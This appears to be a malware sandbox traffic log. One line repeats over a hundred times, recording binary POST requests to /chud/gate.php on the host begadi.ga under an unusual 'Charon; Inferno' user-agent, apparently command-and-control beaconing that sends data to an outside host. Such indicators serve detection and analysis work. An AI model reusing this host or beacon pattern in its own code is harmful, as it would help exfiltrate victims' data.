              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
